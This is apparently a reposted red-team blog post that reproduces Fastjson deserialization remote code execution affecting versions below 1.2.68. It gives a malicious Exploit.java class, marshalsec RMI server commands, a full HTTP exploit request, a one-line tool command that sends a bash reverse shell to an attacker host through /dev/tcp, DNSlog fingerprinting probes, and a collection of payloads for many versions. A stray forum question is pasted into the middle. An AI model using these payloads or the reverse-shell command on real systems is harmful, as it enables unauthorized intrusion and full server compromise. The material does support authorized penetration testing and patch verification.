Red team arsenal: fastjson is less than 1.2.68 full-vulnerability RCE use exp to reproduce

News 2023-07-28 22:15:30 views: null

0x01 Vulnerability Introduction

Fastjson is a json parser open sourced by Alibaba. It has superior performance and is widely used in Java projects of major manufacturers. Fastjson added a deserialization whitelist after version 1.2.24, but in versions before 1.2.48, attackers can use specially constructed json strings to bypass whitelist detection and successfully execute arbitrary commands.

0x02 range of influence

Fastjson < 1.2.68

The bypass method released by Fastjson can kill all versions below 1.2.68

0x03 Vulnerability Reappearance

Let's take Fastjson 1.2.47 as an example, because it is very convenient for vulhub to have a ready-made environment

P牛我用vulhub中的 1.2.47的docker   想测试doslog检查 fastjson 但是总是收到不到dnslog  但是正常的exp反弹shell就是可以我很疑惑    
我的用法正确吗,用的这个{"@type":"java.net.Inet4Address","val":"bouaiq.dnslog.cn"}

The following is a schematic diagram of the process

image-20200704111745527

Host A: Host with fastjson deserialization vulnerability
Host C: Serving RMI/LDAP
Host B: Constructed malicious class (including commands to be executed)

Throughout the remote command execution process

1. The hacker uses the payload to attack host A (the payload needs to specify the rmi/ldap address)

2. Host A triggers a deserialization vulnerability and sends an rmi remote distribution call to connect to host C

3. The rmi service of host C specifies to load the malicious java class of host B, so host A finally loads and executes the malicious java class of host B through the rmi service of host C

4. Host A triggers malicious system command execution

0x04 Recurrence process

Reproduce according to the above process and environment:

Host A: http://1.1.1.1:8090 (host with Fastjson vulnerability)
Host B: http://2.2.2.2:8888 (malicious java service)
Host C: rmi://2.2.2.2:9999 (remote method call service)

Actually hosts B and C are one machine with different ports)

0x041 construct malicious method

The target environment is openjdk:8u102that there is no limitation in this version com.sun.jndi.rmi.object.trustURLCodebase, we can simply use RMI for command execution.

First compile and upload the command execution code

Use the following payload:

Among them, touch /zydx666 is a system command, which can be modified according to your own needs

Note that the file name is Exploit.java and the fixed format cannot be changed

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit{
    
    
    public Exploit() throws Exception {
    
    
        Process p = Runtime.getRuntime().exec(new String[]{
    
    "bash", "-c", "touch /zydx666"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));

        String line;
        while((line = reader.readLine()) != null) {
    
    
            System.out.println(line);
        }

        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }

    public static void main(String[] args) throws Exception {
    
    
    }
}

Use the javac command on host B to compile the Exploit.java file and generate an Exploit.class file

javac Exploit.java

Then start an http service on host B, the middleware is optional, but you need to be able to access the Exploit.class file, here use python3 to temporarily start a

python3 -m http.server --bind 0.0.0.0 8888

0x042 Enable the remote method call rmi service

Next, start the rmi service on host C

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://1.1.1.1:8888/#Exploit" 9999

marshalsec-0.0.3-SNAPSHOT-all.jar

Reference https://github.com/mbechler/marshalsec

So far the services are all ready

0x043 send payload

Next , send the fastjson deserialization vulnerability payload to host A (a vulnerable machine)

POST / HTTP/1.1
Host: 1.1.1.1:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 260

{
    
    
    "a":{
    
    
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
    
    
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://2.2.2.2:9999/Exploit",
        "autoCommit":true
    }
}

At this time, host A receives the POST request, triggers the deserialization vulnerability, and finally executes the content in the Exploit.class file

image-20200703234748062

I am using the reverse shell command

Rebound shell succeeds:

image-20200703234115010

0x05 simplified attack tool

A simplified version of the tool is provided below

It is written by the master of https://github.com/wyzxxz/fastjson_rce_tool, one-click service and jar package that generates the entire rmi+class file of malicious code

Step 1: You only need to start it on your own server

java -cp fastjson_tool.jar fastjson.HRMIServer 1.1.1.1 8888 "bash=bash -i >&/dev/tcp/x.x.x.x/80 0>&1"

Step 2: Send payload

Successfully rebound the shell

image-20200703234914580

0x06 vulnerability detection

Whether the unknown target uses Fastjson, but the site has the original error echo

If the site has the original error report echo, you can use unclosed curly braces to report the error echo, and there will often be fastjson in the error report

For example

image-20200704162617071

No echo, blindly distinguish between Fastjson and Jackson through DNS echo

I use the following payload test

{"zeo":{"@type":"java.net.Inet4Address","val":"745shj.dnslog.cn"}}

image-20200704162844047

Finally received dnslog

image-20200704162922529

The latest version 1.2.67 can still judge whether the backend uses fastjson through dnslog

{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}

Malformation

{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}

POC:

To be nested inside zeo

{"zeo":{"@type":"java.net.Inet4Address","val":"dnslog"}}

{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}
{
   
   {"@type":"java.net.URL","val":"dnslog"}:"aaa"}
Set[{"@type":"java.net.URL","val":"dnslog"}]
Set[{"@type":"java.net.URL","val":"dnslog"}
{
   
   {"@type":"java.net.URL","val":"dnslog"}:0

0x07 Multi-version payload collection

Affected version:

fastjson<=1.2.24

exp:

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://x.x.x.x:1099/jndi", "autoCommit":true}

Affected version:

fastjson<=1.2.41

Prerequisite:
The autoTypeSupport property can only be used if it is true. (fastjson>=1.2.25 defaults to false)

exp:

{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://x.x.x.x:1098/jndi", "autoCommit":true}

Affected version:

fastjson<=1.2.42

Prerequisite:
The autoTypeSupport property can only be used if it is true. (fastjson>=1.2.25 defaults to false)

exp:

{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}

Affected version:

fastjson<=1.2.43

Prerequisite:
The autoTypeSupport property can only be used if it is true. (fastjson>=1.2.25 defaults to false)

exp:

{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}

Affected version:

fastjson<=1.2.45

Prerequisite:
The autoTypeSupport property can only be used if it is true. (fastjson>=1.2.25 defaults to false)

exp:

{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:1399/Exploit"}}

Affected version:

fastjson<=1.2.47

exp:

{
    "a": {
        "@type": "java.lang.Class", 
        "val": "com.sun.rowset.JdbcRowSetImpl"
    }, 
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl", 
        "dataSourceName": "ldap://x.x.x.x:1999/Exploit", 
        "autoCommit": true
    }
}

Affected version:

fastjson<=1.2.62

exp:

{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1098/exploit"}"

Affected version:

fastjson<=1.2.66

Prerequisite:
The autoTypeSupport property can only be used if it is true. (fastjson>=1.2.25 defaults to false)

exp:

{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/Calc"}

{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/Calc"}

{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/Calc"}

{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://192.168.80.1:1399/Calc"}}

Guess you like

Origin blog.csdn.net/god_zzZ/article/details/107122487
Recommended
Ranking
git ,已经提交到git上的一个文件,想要忽略,在.gitignore添加了却不起作用
[Android -- soft skills] share a learning method
018-virtualenv creates python2/3 virtual environment installation and usage notes
Use the Lim test platform to quickly complete batch number creation
Springboot&Springcloud interview questions (including code and display diagram)
Common Components
03-Operation in numpy.array
Use PotPlayer to check the CPU and GPU usage when soft and hard decoding 4K HD videos
linux control history command history
Minio usage and integration starting dependencies
Daily
More
2024-05-28(1)
2024-05-27(1)
2024-05-26(0)
2024-05-25(3)
2024-05-24(12)
2024-05-23(35)
2024-05-22(9)
2024-05-21(35)
2024-05-20(5)
2024-05-19(0)

Code World

© 2018 codetd.com